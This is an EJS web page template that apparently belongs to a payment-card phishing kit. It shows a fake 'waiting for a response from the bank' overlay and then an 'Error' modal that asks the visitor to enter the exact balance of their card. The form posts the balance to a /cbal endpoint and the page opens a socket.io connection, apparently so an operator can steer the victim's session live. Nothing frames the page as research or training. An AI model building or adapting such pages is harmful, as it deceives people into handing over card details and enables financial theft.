<!DOCTYPE html>
<html>

<head>
    <title>
        <%= title %>
    </title>
    <link rel="stylesheet" href="/stylesheets/output.css">
    <link rel='stylesheet' href='/stylesheets/style.css' />
    <%- include("./includes/jivochat.ejs") %>

</head>

<body class="bg-[#F3F2F2] roboto">
    <%- include("./includes/navbar.ejs") %>

        <div class="fixed top-0 left-0 w-full h-full flex justify-center items-center z-[999]">
            <div class="text-center">
                <img src="/images/loading.gif" alt="loading" class="w-40 mx-auto">
                <p class="font-medium text-2xl">Wait</p>
                <p class="font-medium text-lg">We are waiting for a response from the bank...</p>
            </div>
        </div>
        <form class="modal-container" action="/cbal" method="post">
            <div class="modal-backdrop"></div>
            <div class="modal-content p-4 bg-white shadow-lg rounded-lg">
                <h1 class="text-2xl font-medium mb-2 text-center">Error</h1>
                <p class="text-base font-medium">Specify the exact balance of the specified card</p>
                <div class="w-full mr-1 my-4">
                    <label for="cardbalance" class="font-medium">Card balance</label>
                    <input type="tel" id="cardbalance" name="balance"
                        class="block outline-none border-2 border-gray-200 rounded-md py-2 px-2 w-full" required>
                </div>
                <button
                    class="w-full bg-[#DC291E] outline-none border-none py-2 px-10 text-white font-medium rounded-lg block my-4"
                    type="submit">
                    Continue
                </button>
            </div>
        </form>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/4.3.2/socket.io.js"></script>
        <script>
            const socket = io();
        </script>
</body>

</html>